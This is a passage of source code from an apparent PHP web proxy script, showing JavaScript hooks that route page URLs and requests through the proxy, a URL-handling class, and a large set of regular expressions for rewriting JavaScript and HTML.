- // amazing creativity with the name on my part
- setParentStuff:function(proto,server){
- var topdoc=this.thetop.document;
- topdoc.title=document.title;
- // find and set shortcut icon
- var tophead=topdoc.getElementsByTagName("head")[0];
- var links=tophead.getElementsByTagName("link");
- var link=null;
- for(var i=0; i<links.length; i++){
- if(links[i].type=="image/x-icon" && links[i].rel=="shortcut icon")
- link=links[i];
- }
- if(tophead.getElementsByTagName("link").length>0)
- tophead.removeChild(topdoc.getElementsByTagName("link")[0]);
- var favicon=topdoc.createElement("link");
- favicon.type="image/x-icon";
- favicon.rel="shortcut icon";
- favicon.href=(
- link==null?
- this.surrogafy_url(proto+"://"+server+"/favicon.ico"):
- link.href
- );
- tophead.appendChild(favicon);
- },
- XMLHttpRequest_wrap:function(xmlhttpobj){
- xmlhttpobj.<?php echo(COOK_PREF); ?>_open=xmlhttpobj.open;
- xmlhttpobj.open=<?php echo(COOK_PREF); ?>.XMLHttpRequest_open;
- return xmlhttpobj;
- },
- XMLHttpRequest_open:function(){
- if(arguments.length<2) return;
- arguments[1]=<?php echo(COOK_PREF); ?>.surrogafy_url(arguments[1]);
- return this.<?php echo(COOK_PREF); ?>_open.apply(this,arguments);
- },
- // this has to be really aggressive to break a race
- bodyInterval:
- setInterval("<?php echo(COOK_PREF); ?>.appendChildInit();",100),
- documentHeadAppendChild:function(){
- var child=arguments[0];
- if(typeof(child)=="object"){
- for(var attr in child){
- if(<?php echo(COOK_PREF); ?>.isParseAttr(child,attr)){
- <?php echo(COOK_PREF); ?>.setAttr(child,attr,child[attr]);
- }
- }
- }
- var head=document.getElementsByTagName("head")[0];
- return head.appendChild_<?php echo(COOK_PREF); ?>.call(head,child);
- },
- documentBodyAppendChild:function(){
- var child=arguments[0];
- if(typeof(child)=="object"){
- for(var attr in child){
- if(<?php echo(COOK_PREF); ?>.isParseAttr(child,attr)){
- <?php echo(COOK_PREF); ?>.setAttr(child,attr,child[attr]);
- }
- }
- }
- return document.body.appendChild_<?php echo(COOK_PREF); ?>.call(
- document.body,child
- );
- },
- appendChildInit:function(){
- if(document.body && !document.body.appendChild_<?php echo(COOK_PREF); ?>){
- if(document.body && document.body.appendChild){
- // this MUST be under document.body because it appends to "this",
- // which would otherwise mean the COOK_PREF object
- document.body.appendChild_<?php echo(COOK_PREF); ?>=
- document.body.appendChild;
- document.body.appendChild=
- <?php echo(COOK_PREF); ?>.documentBodyAppendChild;
- var head=document.getElementsByTagName("head")[0];
- if(head && head.appendChild){
- head.appendChild_<?php echo(COOK_PREF); ?>=head.appendChild;
- head.appendChild=
- <?php echo(COOK_PREF); ?>.documentHeadAppendChild;
- }
- clearInterval(<?php echo(COOK_PREF); ?>.bodyInterval);
- }
- }
- },
- // WRAPPED FUNCTIONS AND OBJECTS
- thetop:top,
- theparent:parent,
- setTimeout:window.setTimeout,
- setInterval:window.setInterval,
- document_write_queue:"",
- purge:function(){
- thehtml=this.document_write_queue;
- if(thehtml=="") return;
- thehtml=this.parse_all(thehtml);
- this.document_write_queue="";
- document.write_<?php echo(COOK_PREF); ?>(thehtml);
- },
- purge_noparse:function(){
- thehtml=this.document_write_queue;
- if(thehtml=="") return;
- this.document_write_queue="";
- document.write_<?php echo(COOK_PREF); ?>(thehtml);
- }
- }
- <?php } ?>
- // }}}
- // JAVASCRIPT FUNCS: WRAPPING/HOOKING {{{
- <?php if($do_wrap){ ?>
- document.write_<?php echo(COOK_PREF); ?>=document.write;
- document.writeln_<?php echo(COOK_PREF); ?>=document.writeln;
- document.write=function(html){
- <?php echo(COOK_PREF); ?>.document_write_queue+=html;
- }
- document.writeln=function(html){
- <?php echo(COOK_PREF); ?>.document_write_queue+=html+"\n";
- }
- window.open_<?php echo(COOK_PREF); ?>=window.open;
- window.open=document.open=function(){
- if(arguments.length<1) return;
- var url=<?php echo(COOK_PREF); ?>.surrogafy_url(arguments[0]);
- if(
- (url.substring(0,1)=="\"" || url.substring(0,1)=="'") &&
- url.substring(0,1)==url.substring(url.length-1,url.length)
- ) url=url.substring(1,url.length-1);
- arguments[0]=url;
- return window.open_<?php echo(COOK_PREF); ?>.apply(this.caller,arguments);
- }
- setTimeout=function(){
- if(arguments.length<1) return;
- if(typeof(arguments[0])==typeof("")){
- arguments[0]=<?php echo(COOK_PREF); ?>.parse_all(
- arguments[0],"application/x-javascript");
- }
- return <?php echo(COOK_PREF); ?>.setTimeout.apply(this,arguments);
- }
- setInterval=function(){
- if(arguments.length<1) return;
- if(typeof(arguments[0])==typeof("")){
- arguments[0]=<?php echo(COOK_PREF); ?>.parse_all(
- arguments[0],"application/x-javascript");
- }
- return <?php echo(COOK_PREF); ?>.setInterval.apply(this,arguments);
- }
- if(window.attachEvent){
- window.attachEvent(
- "onload",<?php echo(COOK_PREF); ?>.appendChildInit, false
- );
- }
- if(document.addEventListener){
- document.addEventListener("DOMContentLoaded",
- <?php echo(COOK_PREF); ?>.appendChildInit, false
- );
- }
- // things that have to be wrapped after page has loaded
- /* hooking for eval(), not necessary anymore, but worked relatively well in the
- * past
- /*eval_<?php echo(COOK_PREF); ?>=eval;
- eval=function(){
- if(arguments.length<1) return;
- arguments[0]=<?php echo(COOK_PREF); ?>.parse_all(
- arguments[0],"application/x-javascript");
- return eval_<?php echo(COOK_PREF); ?>.apply(this.caller,arguments);
- }*/
- // wrap top and parent objects for anti-frame breaking
- if(<?php echo(COOK_PREF); ?>.PAGE_FRAMED){
- <?php echo(COOK_PREF); ?>.thetop.frames[0].window.top=
- <?php echo(COOK_PREF); ?>.thetop.frames[0].window;
- <?php echo(COOK_PREF); ?>.thetop.frames[0].window.parent=
- <?php echo(COOK_PREF); ?>.thetop.frames[0].window;
- top=parent=
- <?php echo(COOK_PREF); ?>.thetop.frames[0].top=
- <?php echo(COOK_PREF); ?>.thetop.frames[0].parent=
- <?php echo(COOK_PREF); ?>.thetop.frames[0].window;
- }
- <?php } ?>
- // }}}
- //</script><?php exit(); }
- # }}}
- # PRELIMINARY {{{
- # PRELIMINARY: AURL CLASS {{{
- # class for URL
- class aurl{
- var $url,$topurl,$locked,$force_unlocked;
- var $proto,$userpass,$servername,$portval,$path,$file,$query,$label;
- function aurl($url,$topurl=null,$force_unlocked=false){
- global $CONFIG;
- if(strlen($url)>$CONFIG['MAXIMUM_URL_LENGTH']) $this->url=null;
- else $this->url=
- preg_replace('/&#([0-9]+);/e','chr(\1)',
- trim(str_replace('&','&',
- str_replace(chr(13),'',
- str_replace(chr(10),'',
- $url)))));
- $this->topurl=$topurl;
- $this->force_unlocked=$force_unlocked;
- $this->determine_locked(true);
- if($this->locked) return;
- $urlwasvalid=true;
- if(!preg_match(URLREG,$this->url)){
- $urlwasvalid=false;
- if($this->topurl==null) $this->url=
- 'http://'.
- (
- $this->url{0}==':' || $this->url{0}=='/'?
- substr($this->url,1):
- $this->url
- ).
- (strpos($this->url,'/')!==false?null:'/');
- else{
- $newurl=
- $this->topurl->get_proto().
- $this->get_fieldreq(2,$this->topurl->get_userpass()).
- $this->topurl->get_servername().
- (($this->topurl->get_portval()!=80 && (
- $this->topurl->get_proto()=='https'?
- $this->topurl->get_portval()!=443:
- true
- ))?':'.$this->topurl->get_portval():null);
- if(strlen($this->url)>0 && $this->url{0}!='/')
- $newurl.=$this->topurl->get_path();
- $this->url=$newurl.$this->url;
- }
- }
- $this->set_proto((
- $urlwasvalid || $this->topurl==null?
- preg_replace('/^([^:\/]*).*$/','\1',$this->url):
- $this->topurl->get_proto()
- ));
- $this->set_userpass(preg_replace(URLREG,'\2',$this->url));
- $this->set_servername(preg_replace(URLREG,'\3',$this->url));
- $this->set_portval(preg_replace(URLREG,'\4',$this->url));
- $this->set_path(preg_replace(URLREG,'\5',$this->url));
- $this->set_file(preg_replace(URLREG,'\6',$this->url));
- $this->set_query(preg_replace(URLREG,'\7',$this->url));
- $this->set_label(preg_replace(URLREG,'\8',$this->url));
- if(!$this->locked && !preg_match(URLREG,$this->url))
- havok(7,$this->url); #*
- }
- function determine_locked($firstload=false){
- if($this->force_unlocked) $this->locked=false;
- elseif(preg_match(AURL_LOCK_REGEXP,$this->url)>0) $this->locked=true;
- elseif(
- (!$firstload && $this->get_url(false,false)==THIS_SCRIPT) ||
- ($firstload && $this->url==THIS_SCRIPT)
- ) $this->locked=true;
- else $this->locked=false;
- } #*
- function get_fieldreq($fieldno,$value){
- $fieldreqs=array(
- 2 => '://'.($value!=null?"$value@":null),
- 4 => ($value!=null && intval($value)!=80?':'.intval($value):null),
- 7 => ($value!=null?"?$value":null),
- 8 => ($value!=null?"#$value":null));
- if(!array_key_exists($fieldno,$fieldreqs))
- return (empty($value)?null:$value);
- else return $fieldreqs[$fieldno];
- }
- function set_proto($proto=''){
- if($this->locked) return;
- $this->proto=(!empty($proto)?$proto:'http');
- }
- function get_proto(){ return $this->proto; }
- function get_userpass(){ return $this->userpass; }
- function set_userpass($userpass=null){ $this->userpass=$userpass; }
- function get_servername(){ return $this->servername; }
- function set_servername($servername=null){ $this->servername=$servername; }
- function get_portval(){
- return (
- empty($this->portval)?
- ($this->get_proto()=='https'?'443':'80'):
- $this->portval
- );
- }
- function set_portval($port=null){
- $this->portval=strval((intval($port)!=80)?$port:null);
- }
- function get_path(){
- if(strpos($this->path,'/../')!==false)
- $this->path=
- preg_replace('/(?:\/[^\/]+){0,1}\/\.\.\//','/',$this->path);
- if(strpos($this->path,'/./')!==false)
- while(
- ($path=str_replace('/./','/',$this->path)) &&
- $path!=$this->path
- ) $this->path=$path;
- return $this->path;
- }
- function set_path($path=null){ $this->path=(empty($path)?'/':$path); }
- function get_file(){ return $this->file; }
- function set_file($file=null){ $this->file=$file; }
- function get_query(){ return $this->query; }
- function set_query($query=null){ $this->query=$query; }
- function get_label(){ return $this->label; }
- function set_label($label=null){ $this->label=$label; }
- function get_url($withlabel=true,$withquery=true){
- if($this->locked) return $this->url;
- return
- $this->get_proto().'://'.
- ($this->get_userpass()==null?null:$this->get_userpass().'@').
- $this->get_servername().
- (
- (
- $this->get_proto()=='https' &&
- intval($this->get_portval())==443
- ) || intval($this->get_portval())==80?
- null:
- ':'.intval($this->get_portval())
- ).
- $this->get_path().$this->get_file().
- (
- !$withquery || $this->get_query()==null?
- null:
- '?'.$this->get_query()).
- (
- !$withlabel || $this->get_label()==null?
- null:
- '#'.$this->get_label()
- );
- }
- function surrogafy(){
- global $OPTIONS;
- $label=$this->get_label();
- $this->set_label();
- $url=$this->get_url();
- $this->set_label($label);
- #$this->determine_locked();
- if($this->locked) return $url;
- if($OPTIONS['ENCRYPT_URLS'] && !$this->locked) $url=proxenc($url);
- $url=THIS_SCRIPT."?={$url}".(!empty($label)?"#$label":null);
- return $url;
- }
- }
- # }}}
- # PRELIMINARY: GLOBAL VARIABLE SETUP {{{
- global $curr_urlobj;
- $curr_urlobj=new aurl($curr_url);
- global $cook_prefix, $cook_prefdomain;
- $cook_prefdomain=
- preg_replace('/^www\./i','',$curr_urlobj->get_servername()); #*
- $cook_prefix=str_replace('.','_',$cook_prefdomain).COOKIE_SEPARATOR;
- # }}}
- # }}}
- # REGEXPS {{{
- # This is where all the parsing is defined. If a site isn't being
- # parsed properly, the problem is more than likely in this section.
- # The rest of the code is just there to set up this wonderful bunch
- # of incomprehensible regular expressions.
- # REGEXPS: CONVERSION TO JAVASCRIPT {{{
- function bool_to_js($bool){ return ($bool?'true':'false'); }
- function fix_regexp($regexp){
- global $js_varsect;
- global
- $js_expr_set, $js_expr2_set, $js_expr3_set, $js_expr4_set,
- $js_expr_get, $js_expr2_get, $js_expr3_get, // DEBUG CAN REMOVE js_expr3_get
- $g_js_expr, $g_js_expr2, $g_js_expr3;
- // backreference cleanup
- $js_varsect_wrap="({$js_varsect})";
- $js_varsect_wrap2="(({$js_varsect}))";
- $oregexp=$regexp;
- $regexp=str_replace($js_expr_set,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($js_expr2_set,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($js_expr3_set,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($js_expr4_set,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($js_expr_get,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($js_expr2_get,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($js_expr3_get,$js_varsect_wrap2,$regexp); // DEBUG CAN REMOVE
- $regexp=str_replace($g_js_expr,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($g_js_expr2,$js_varsect_wrap2,$regexp);
- $regexp=str_replace($g_js_expr3,$js_varsect_wrap2,$regexp);
- $regexp=preg_replace('/\(\?P\<[a-z0-9_]+\>/i','(',$regexp);
- $regexp=preg_replace('/\(\?P\>[a-z0-9_]+\)/i',$js_varsect,$regexp);
- $regexp=preg_replace('/\(\?\<\![^\)]+?\)/i','',$regexp);
- $regexp=str_replace(FERP_KOOC.COOK_PREF,'',$regexp);
- $regexp=str_replace(FERP_KOOC,'',$regexp);
- return $regexp;
- }
- function escape_regexp($regexp,$dollar=false){
- $regexp=
- str_replace('\\','\\\\',
- str_replace('\'','\\\'',
- str_replace('"','\\"',
- str_replace(chr(10),'\n',
- str_replace(chr(13),'\r',
- str_replace(chr(9),'\t',
- $regexp
- ))))));
- return ($dollar?preg_replace('/[\\\\]+(?=[0-9])/','\\\\$',$regexp):
- preg_replace('/[\\\\]+(?=[0-9])/','\\\\\\\\',$regexp)); #*
- }
- function convert_array_to_javascript(){
- global $regexp_arrays;
- $js='regexp_arrays=new Array('.count($regexp_arrays).");\n";
- reset($regexp_arrays);
- while(list($key,$arr)=each($regexp_arrays)){
- $js.="regexp_arrays[\"{$key}\"]=new Array(".count($arr).");\n";
- for($i=0;$i<count($arr);$i++){
- $js.="regexp_arrays[\"{$key}\"][{$i}]=new Array(";
- if($arr[$i][0]==1)
- $js.=
- '1,'.escape_regexp(fix_regexp($arr[$i][2])).'g,"'.
- escape_regexp(fix_regexp($arr[$i][3]),true).'"';
- elseif($arr[$i][0]==2)
- $js.=
- '2,'.escape_regexp(fix_regexp($arr[$i][2])).
- "g,{$arr[$i][3]}".
- (count($arr[$i])<5?null:','.bool_to_js($arr[$i][4])).
- (count($arr[$i])<6?null:",{$arr[$i][5]}");
- $js.=");\n";
- }
- }
- return stripslashes($js);
- }
- # }}}
- # REGEXPS: VARIABLES {{{
- global $regexp_arrays, $js_varsect;
- /* Variable Naming Tags
- js: Javascript
- html: HTML
- hook: are used to determine what is going to be hooked by the script
- g: global helper variable
- h: local/short term helper variable
- l: 'looker' (uses lookaheads or lookbehinds for anchoring)
- n: 'not'
- */
- # REGEXPS: VARIABLES: Helper Variables {{{
- /*
- $g_justspace: just space characters (no newlines) 0+
- $g_plusjustspace: just space characters (no newlines) 1+
- $g_anyspace: any space characters at all 0+
- $g_plusspace: any space characters at all 1+
- $g_anynewline: any newline characters 0+
- $g_plusnewline: any newline characters 1+
- $g_n_anynewline: not any newline characters 0+
- $g_n_plusnewline: not any newline characters 1+
- $g_bool_operand: any boolean operand 1
- $g_operand: any operand 1
- $g_n_operand: anything but an operand 1
- $g_quoteseg: any quote segment 2+
- $g_regseg: any regular expression segment 2+
- */
- $g_justspace="[\t ]*";
- $g_plusjustspace="[\t ]+";
- $g_anyspace="[\t\r\n ]*";
- $g_plusspace="[\t\r\n ]+";
- $g_anynewline="[\r\n]*";
- $g_plusnewline="[\r\n]+";
- $g_n_anynewline="[^\r\n]*";
- $g_n_plusnewline="[^\r\n]+";
- $g_bool_operand='(?:\|\||\&\&|\!=|==|\>|\<|\<=|\>=)';
- $g_operand=
- "(?:{$g_bool_operand}|[\+\-\/\*\|\&\%]|\>|\>\>|\>\>\>|\<|\<\<|\<\<\<)";
- $g_n_operand='[^\+\-\/\*\|\&\%\<\>\?\:]';
- $g_quoteseg=
- "(?:\"(?:\\\\(?:\\\\\\\\)*?\"|[^\"])*?\"|".
- "\'(?:\\\\(?:\\\\\\\\)*?\'|[^\'])*?\')";
- # no quotes (new)
- $g_regseg="\/(?:\\\\(?:\\\\\\\\)*?[\/\"\']|[^\/\"\'])*?\/[a-z]*";
- # }}}
- # REGEXPS: VARIABLES: Parsing Config {{{
- /*
- $html_frametargets: html list of frame targets to look out for
- $hook_html_attrs: hook html attributes
- $hook_js_attrs: js hook attributes for getting and setting
- $hook_js_getattrs: js hook attributes for getting only
- $hook_js_methods: js hook methods
- $js_string_methods: js methods for the String() object
- $js_string_attrs: js attributes for the String() object
- */
- # HTML
- $html_frametargets='_(?:top|parent|self)';
- $hook_html_attrs='(data|href|src|background|pluginspage|codebase|action)';
- # Javascript
- /*$hook_js_attrs=
- if($dollar) die($ret);
- '(?:href|src|location|action|backgroundImage|pluginspage|codebase|'.
- 'location\.href|innerHTML|cookie|search|hostname)';
- $hook_js_getattrs=
- "(?:{$hook_js_attrs}|userAgent|platform|appCodeName|appName|appVersion|".
- 'language|oscpu|product|productSub|plugins)';*/
- $hook_js_methods='(location\.(?:replace|assign))';
- $js_string_methods=
- '(?:anchor|big|blink|bold|charAt|charCodeAt|concat|fixed|fontcolor|'.
- 'fontsize|fromCharCode|indexOf|italics|lastIndexOf|link|match|replace|'.
- 'search|slice|small|split|strike|sub|substr|substring|sup|toLowerCase|'.
- 'toUpperCase|toSource|valueOf)';
- $js_string_attrs='(?:constructor|length|prototype)';
- # }}}
- # REGEXPS: VARIABLES: Javascript Expressions Matching {{{
- /*
- $js_varsect: flat variable section
- $js_jsvarsect: flat variable section for use in js's parsing engine
- $n_js_varsect: not a javascript variable section
- $h_js_exprsect: helper for js_exprsect
- $js_exprsect: single expression section
- $h_js_expr: helper for js_expr
- $js_expr: any javascript expression
- $js_expr2, ...: $js_expr requires use of a named submatch, so there needs
- to be multiple versions of $js_expr for use multiple times in
- one regular expression
- */
- $js_varsect=
- "(?:new{$g_plusspace})?[a-zA-Z_\$]".
- "(?:[a-zA-Z0-9\$\._]*[a-zA-Z0-9_\$])?";
- $js_jsvarsect=
- "(?:new{$g_plusspace})?[a-zA-Z_\$]".
- "(?:[a-zA-Z0-9\$\._]*[a-zA-Z0-9_\[\]\$])?";
- $n_js_varsect='(?![a-zA-Z\._\[\]])';
- $h_js_exprsect=
- "(?!return|\/\*|\/\/)".
- "(?:{$g_quoteseg}|{$g_regseg}|{$js_varsect}|[0-9\.]+)";
- $js_exprsect="(?:{$h_js_exprsect}|\({$h_js_exprsect}\))";
- $h_js_paren=
- "\({$g_anyspace}(?:(?P>js_expr)".
- "(?:{$g_anyspace},{$g_anyspace}(?P>js_expr))*{$g_anyspace})?\)";
- $h_js_brace=
- "\{{$g_anyspace}(?:(?P>js_expr)".
- "(?:{$g_anyspace},{$g_anyspace}(?P>js_expr))*{$g_anyspace})?\}";
- $h_js_bracket=
- "\[{$g_anyspace}(?:(?P>js_expr)".
- "(?:{$g_anyspace},{$g_anyspace}(?P>js_expr))*{$g_anyspace})?\]";
- $h_js_expr="{$h_js_paren}|{$h_js_brace}";
- $h_js_expr2="{$h_js_paren}|{$h_js_brace}|{$h_js_bracket}";
- $js_expr_get=
- '(?P<js_expr>'.
- "(?!(?:if|for|while){$g_anyspace}\()". # this watches out for internal
- "(?<!delete )". # functions of javascript
- '(?!'.COOK_PREF. # this makes sure
- '\.(?:purge|getAttr)\()'. # COOK_PREF.purge() doesn't get
- '(?<!'.COOK_PREF.'\.setAttr\()'. # parsed, and that
- # getAttr() doesn't wrap around
- # another getAttr(); below,
- # this is replaced for
- # setAttr() since it needs to
- # wrap around getAttr()
- '(?:'.#(?!'.COOK_PREF.')'. # begin with some expr
- "{$h_js_expr}|{$js_exprsect}|\[\])". #
- "(?:{$g_anyspace}(?:". # START
- "\.{$g_anyspace}{$js_exprsect}". # attribute
- "|\.{$g_anyspace}(?P>js_expr)". # recursive attribute
- "|{$g_operand}{$g_anyspace}(?P>js_expr)". # any operand
- "|\?{$g_anyspace}(?P>js_expr){$g_anyspace}". # ternary operator
- "\:{$g_anyspace}(?P>js_expr)". #
- "|\({$g_anyspace}(?:{$js_varsect})?". # anonymous functions
- "(?:{$g_anyspace},{$g_anyspace}". # args
- "{$js_varsect})*{$g_anyspace}\)". # below is for code
- $g_anyspace.
- "(?P<js_expr_brace>\{(?:(?>[^\{\}]+)|(?P>js_expr_brace))*\})".
- "|{$h_js_expr2}". # brackets, parens, braces
- "){$g_anyspace})*)"; # END
- // for setAttr()
- $js_expr_set=preg_replace('/\|?getAttr/','',$js_expr_get);
- // for global use
- $g_js_expr=preg_replace('/\|?getAttr/','',$js_expr_get);
- $g_js_expr=str_replace('js_expr','g_js_expr',$g_js_expr);
- // these should only be produced as required in the code
- // setAttr()
- $js_expr2_set=str_replace('js_expr','js_expr2',$js_expr_set);
- $js_expr3_set=str_replace('js_expr','js_expr3',$js_expr_set);
- $js_expr4_set=str_replace('js_expr','js_expr4',$js_expr_set);
- // getAttr()
- $js_expr2_get=str_replace('js_expr','js_expr2',$js_expr_get);
- $js_expr3_get=str_replace('js_expr','js_expr3',$js_expr_get); // DEBUG CAN REMOVE!
- // global use
- $g_js_expr2=str_replace('g_js_expr','g_js_expr2',$g_js_expr);
- $g_js_expr3=str_replace('g_js_expr','g_js_expr3',$g_js_expr);
- # }}}
- # REGEXPS: VARIABLES: Miscellaneous {{{
- /*
- $l_js_end: looks for if end of javascript statement
- $n_l_js_end: looks for if not end of javascript statement (#)
- $js_begin: matches beginning of javascript statement
- $js_begin_right: matches beginning of javascript statement on the RHS
- $js_xmlhttpreq: XMLHttpRequest matching (plus ActiveX version)
- $h_html_noquot: matches an HTML attribute value that is not using quotes
- $html_reg: matches an HTML attribute value
- $js_newobj: matches a 'new' clause inside of Javascript
- $html_formnotpost: matches a form, given it's not of method POST
- */
- $l_js_end="(?={$g_justspace}(?:[;\)\}\r\n=\!\|\&,]|{$g_n_operand}[\n\r]))";
- #$n_l_js_end="(?!{$g_justspace}(?:[;\}]|{$g_n_operand}[\n\r]))";
- $js_begin=
- "((?:[;\{\}\n\r\(\)\&\!]|[\!=]=)(?!{$g_anyspace}(?:#|\/\*|\/\/|'|\"))".
- "{$g_anyspace})";
- $js_end=
- "((?:$|\G|[;\)\{\}\r\n=\!\|\&,]|[\!=]=|(?:else|return){$g_plusspace}|".
- "{$g_operand}{$g_anyspace}{$g_js_expr}".
- "){$g_anyspace})";
- $js_end_get= # right now this is the same as js_end, but this is easier to debug
- "((?:$|\G|[;\)\{\}\r\n=\!\|\&,]|[\!=]=|(?:else|return){$g_plusspace}|".
- "{$g_operand}{$g_anyspace}{$g_js_expr}".
- "){$g_anyspace})";
- $js_begin_strict_end=str_replace('g_js_expr','g_js_expr3',$js_end);
- $js_begin_strict=
- "({$js_begin_strict_end}".
- "(?!{$g_anyspace}(?:#|\/\*|\/\/|'|\")))";
- $n_js_string="(?!{$g_anyspace}['\"])";
- $n_js_set="(?!{$g_anyspace}(?:=[^=]|\+=|\-=|\*=|\/=|\+\+|\-\-))"; # DEBUG
- $n_js_set_left="(?<!\-\-|\+\+)";
- $wrap_js_end_set=
- "({$n_js_set}{$n_js_string}{$js_end}|".
- "(?={$g_anyspace}(?:{$g_bool_operand}|=)))";
- $wrap_js_end_set=
- "({$n_js_set}{$n_js_string}(?!=){$js_end}|".
- "(?={$g_anyspace}(?!=)(?:{$g_bool_operand})))"; # TODO: TEMP (no equals)
- $wrap_js_end_get=
- "({$n_js_set}{$n_js_string}{$n_js_varsect}(?![=\[]){$js_end_get})";#|".
- #"(?={$g_anyspace}(?!=)(?:{$g_bool_operand})))"; # get can't have = here
- $js_begin_right=
- '((?:\G|'.
- "[;\{\(=\+]|". # some operators
- "(?<!\/)\*(?!\/)|". # not a comment, but an asterisk
- #"(?<!:[\/])[\/](?![\/])|". # slash ('/') without being a
- # part of "://"
- "[^a-zA-Z0-9\~\-\/\.\_\"'\(\[\]\)]|". # URL string without being in a JS
- # string
- "[\}\)]{$g_anyspace};?{$g_anyspace}". # brace/paren followed by a
- # semicolon
- "){$g_anyspace})";
- #$js_begin_right=
- # "((?:[;\{\(=\+\-\*]|[\}\)]{$g_anyspace};{$g_anyspace}|".
- # "(?<!:[\/])[\/](?![\/])){$g_justspace})";
- #$js_begin_right="((?:[;\{\}\(\)=\+\-\*]|(?<!:[\/])[\/](?![\/])){$g_justspace})";
- $js_xmlhttpreq=
- '(?<!XMLHttpRequest_wrap\(new )'.
- "(?:XMLHttpRequest{$g_anyspace}(?:\({$g_anyspace}\)|)|".
- "ActiveXObject{$g_anyspace}\({$g_anyspace}[^\)]+\.XMLHTTP['\"]".
- "{$g_anyspace}\))";
- $h_html_noquot='(?:[^"\'\\\\][^> ]*)';
- $html_reg="({$g_quoteseg}|{$h_html_noquot})";
- $js_newobj="(?:new{$g_plusspace})";
- $html_formnotpost="(?:(?!method{$g_anyspace}={$g_anyspace}(?:'|\")?post)[^>])";
- # }}}
- # }}}
- # REGEXPS: JAVASCRIPT PARSING {{{
- $js_regexp_arrays=array(
- /*array(1,2
- "/{$js_begin}{$js_expr_set}{$g_anyspace}=".
- "({$g_anyspace}{$js_expr2_set}{$g_anyspace}=)".
- "({$g_anyspace}{$js_expr3_set}{$g_anyspace}=)?".
- "({$g_anyspace}{$js_expr4_set}{$g_anyspace}{$wrap_js_end})/",
- "\\1\\2=\\7;\\3\\7;\\5\\7");*/ # TODO
- # object.attribute parsing (set)
- # prepare for set for +=
- array(1,2,
- "/{$js_begin}{$js_expr_get}\.({$js_varsect}){$g_anyspace}\+=/im",
- "\\1\\2.\\4=".COOK_PREF.".getAttr(\\2,/\\4/)+"),
- # set for =
- array(1,2,
- "/{$js_begin_strict}{$js_expr_set}\.(({$js_varsect}){$g_anyspace}=".
- #"(?:{$g_anyspace}{$js_expr2_set}{$g_anyspace}=)*".
- "{$g_anyspace}){$js_expr3_set}{$wrap_js_end_set}/im",
- #"\\1\\4.\\6=".COOK_PREF.".setAttr(\\4,/\\6/,\\8)\\9"), #TODO: new way?
- "\\1".COOK_PREF.".setAttr(\\5,/\\8/,".
- FERP_KOOC."\\9".FERP_KOOC.COOK_PREF.")\\11"),
- # object['attribute'] parsing (set)
- # prepare for set for +=
- array(1,2,
- "/{$js_begin}{$js_expr_get}\[{$js_expr2_get}\]{$g_anyspace}\+=/im",
- "\\1\\2[\\4]=".COOK_PREF.".getAttr(\\2,\\4)+"),
- # set for =
- array(1,2,
- "/{$js_begin_strict}{$js_expr_set}(\[{$js_expr2_set}\]{$g_anyspace}=".
- #"(?:{$g_anyspace}{$js_expr3_set}{$g_anyspace}=)*".
- "{$g_anyspace}){$js_expr4_set}{$wrap_js_end_set}/im",
- //"\\1\\4[\\6]=".COOK_PREF.".setAttr(\\4,\\6,\\8)\\9"), #TODO: new way?
- "\\1".COOK_PREF.".setAttr(\\5,\\8,".
- FERP_KOOC."\\10".FERP_KOOC.COOK_PREF.")\\12"),
- # object.getAttribute parsing # TODO NOW
- # object.setAttribute parsing
- array(1,2,
- "/{$js_begin_strict}{$js_expr_set}\.setAttribute{$g_anyspace}\(".
- "{$g_anyspace}{$js_expr2_set}{$g_anyspace},{$g_anyspace}".
- "{$js_expr3_set}{$g_anyspace}\)/im",
- #"\\1\\4[\\5]=".COOK_PREF.".setAttr(\\4,\\5,\\6)"), #TODO: new way?
- "\\1".COOK_PREF.".setAttr(\\5,\\7,".
- FERP_KOOC."\\9".FERP_KOOC.COOK_PREF.')'),
- # get parsing
- # get: object[attribute]
- array(1,2,
- "/{$js_begin_right}{$n_js_set_left}{$js_expr_get}\[{$js_expr2_get}\]".
- "{$wrap_js_end_get}/im",
- "\\1".COOK_PREF.".getAttr(\\2,\\4)".
- FERP_KOOC."\\6".FERP_KOOC.COOK_PREF),
- # get: object.attribute
- array(1,2,
- "/{$js_begin_right}{$n_js_set_left}{$js_expr_get}\.({$js_varsect})".
- "((?:\.(?:{$js_string_attrs}|{$js_string_methods}{$h_js_paren})*)?)".
- "{$wrap_js_end_get}/im",
- "\\1".COOK_PREF.".getAttr(\\2,/\\4/)\\5".
- FERP_KOOC."\\7".FERP_KOOC.COOK_PREF),
- # other stuff
- # method parsing
- array(1,2,
- "/([^a-z0-9]{$hook_js_methods}{$g_anyspace}\(){$js_expr_get}\)/im",
- "\\1".COOK_PREF.".surrogafy_url(\\3))"),
- # de-method parsing
- array(1,2,
- "/{$js_begin_right}{$n_js_set_left}({$js_varsect})\.getAttributeNode\(".
- "{$js_expr_get}\)/im",
- "\\1".COOK_PREF.".getAttrNode(\\2,\\3)"),
- # eval parsing
- array(1,2,
- "/([^a-z0-9])eval{$g_anyspace}\(".
- "(?!".COOK_PREF.")({$g_anyspace}{$g_js_expr})\)/im",
- "\\1eval(".COOK_PREF.".parse_all(\\2,\"application/x-javascript\"))"),
- # action attribute parsing
- array(1,2,
- "/{$js_begin}\.action{$g_anyspace}=/im",
- "\\1.".COOK_PREF.".value="),
- # XMLHttpRequest parsing
- array(1,2,
- "/({$js_newobj}{$js_xmlhttpreq})/im",
- COOK_PREF.".XMLHttpRequest_wrap(\\1)"),
- # form.submit() call parsing
- ($OPTIONS['ENCRYPT_URLS']?array(1,2,
- "/{$js_begin}((?:[^\) \{\}]*(?:\)\.{0,1}))+)(\.submit{$g_anyspace}\(\)".
- "){$l_js_end}/im",
- "\\1void((\\2.method==\"post\"?null:\\2\\3));")
- :null),
- );
- # }}}
- # REGEXPS: HTML/CSS PARSING {{{
- $regexp_arrays=array(
- 'text/html' => array(
- # target attr
- (PAGETYPE_ID===PAGETYPE_FRAMED_PAGE?array(1,1,
- "/(<[a-z][^>]*{$g_anyspace}) target{$g_anyspace}={$g_anyspace}".
- "(?:{$html_frametargets}|('){$html_frametargets}'|(\")".
- "{$html_frametargets}\")".
- "/im",
- '\1')
- :null),
- (PAGETYPE_ID===PAGETYPE_FRAMED_CHILD?array(1,1,
